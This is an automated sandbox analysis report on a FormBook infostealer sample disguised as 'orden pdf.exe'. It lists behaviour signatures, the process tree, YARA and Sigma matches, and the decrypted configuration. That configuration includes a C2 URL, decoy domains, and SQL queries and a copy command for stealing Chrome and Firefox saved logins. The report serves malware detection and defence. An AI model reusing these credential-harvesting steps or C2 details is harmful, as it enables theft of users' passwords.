Loading ...

Play interactive tourEdit tour

Analysis Report orden pdf.exe

Overview

General Information

Sample Name:orden pdf.exe
Analysis ID:339334
MD5:4f1ad14256cc9c420d78d69b468bab48
SHA1:7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256:1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • orden pdf.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\orden pdf.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 4700 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
    • orden pdf.exe (PID: 5476 cmdline: C:\Users\user\Desktop\orden pdf.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4120 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
          • DeviceCensus.exe.exe (PID: 5652 cmdline: 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' MD5: 4F1AD14256CC9C420D78D69B468BAB48)
        • systray.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 6180 cmdline: /c del 'C:\Users\user\Desktop\orden pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2412 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cx9l_rq2dula.exe (PID: 5296 cmdline: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe MD5: 4F1AD14256CC9C420D78D69B468BAB48)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xcc1048c5", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122d4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "audereventur.com", "huro14.com", "wwwjinsha155.com", "antiquevendor.com", "samuraisoulfood.net", "traffic4updates.download", "hypersarv.com", "rapport-happy-wedding.com", "rokutechnosupport.online", "allworljob.com", "hanaleedossmann.com", "kauai-marathon.com", "bepbosch.com", "kangen-international.com", "zoneshopemenowz.com", "belviderewrestling.com", "ipllink.com", "sellingforcreators.com", "wwwswty6655.com", "qtumboa.com", "bazarmoney.net", "librosdecienciaficcion.com", "shopmomsthebomb.com", "vanjacob.com", "tgyaa.com", "theporncollective.net", "hydrabadproperties.com", "brindesecologicos.com", "sayagayrimenkul.net", "4btoken.com", "shycedu.com", "overall789.top", "maison-pierre-bayle.com", "elitemediamasters.com", "sharmasfabrics.com", "hoshamp.com", "myultimateleadgenerator.com", "office4u.info", "thaimart1.com", "ultimatewindowusa.com", "twoblazesartworks.com", "airteloffer.com", "shoupaizhao.com", "741dakotadr.info", "books4arab.net", "artedelcioccolato.biz", "tjqcu.info", "teccoop.net", "maturebridesdressguide.com", "excelcapfunding.com", "bitcoinak.com", "profileorderflow.com", "unbelievabowboutique.com", "midlandshomesolutionsltd.com", "healthywithhook.com", "stirlingpiper.com", "manfast.online", "arikorin.com", "texastrustedinsurance.com", "moodandmystery.com", "yh77808.com", "s-immotanger.com", "runzexd.com", "meteoannecy.net", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.joomlas123.info/n7ak/\u0000"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.urlMethodology_Suspicious_Shortcut_Local_URLDetects local script usage for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x94c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9742:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x153d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14ec1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x154d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1564f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa2ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1413c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xafc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b74a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18059:$sqlite3step: 68 34 1C 7B E1
    • 0x1816c:$sqlite3step: 68 34 1C 7B E1
    • 0x18088:$sqlite3text: 68 38 2A 90 C5
    • 0x181ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1809b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x181c3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 55 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.orden pdf.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.orden pdf.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.orden pdf.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18449:$sqlite3step: 68 34 1C 7B E1
        • 0x1855c:$sqlite3step: 68 34 1C 7B E1
        • 0x18478:$sqlite3text: 68 38 2A 90 C5
        • 0x1859d:$sqlite3text: 68 38 2A 90 C5
        • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.orden pdf.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.orden pdf.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Drops script at startup locationShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\orden pdf.exe, ProcessId: 2224, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
          Sigma detected: Steal Google chrome login dataShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\systray.exe, ParentImage: C:\Windows\SysWOW64\systray.exe, ParentProcessId: 3652, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2412

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 2.2.orden pdf.exe.400000.1.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xcc1048c5", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0122d4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01445", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exeReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: orden pdf.exeVirustotal: Detection: 50%Perma Link
          Source: orden pdf.exeReversingLabs: Detection: 32%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
          Source: 2.2.orden pdf.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.orden pdf.exe.39e0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: orden pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: orden pdf.exe
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_001B6CA9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001B60DD
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001B63F9
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_001BEB60
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF56F FindFirstFileW,FindClose,0_2_001BF56F
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_001BF5FA
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C1B2F
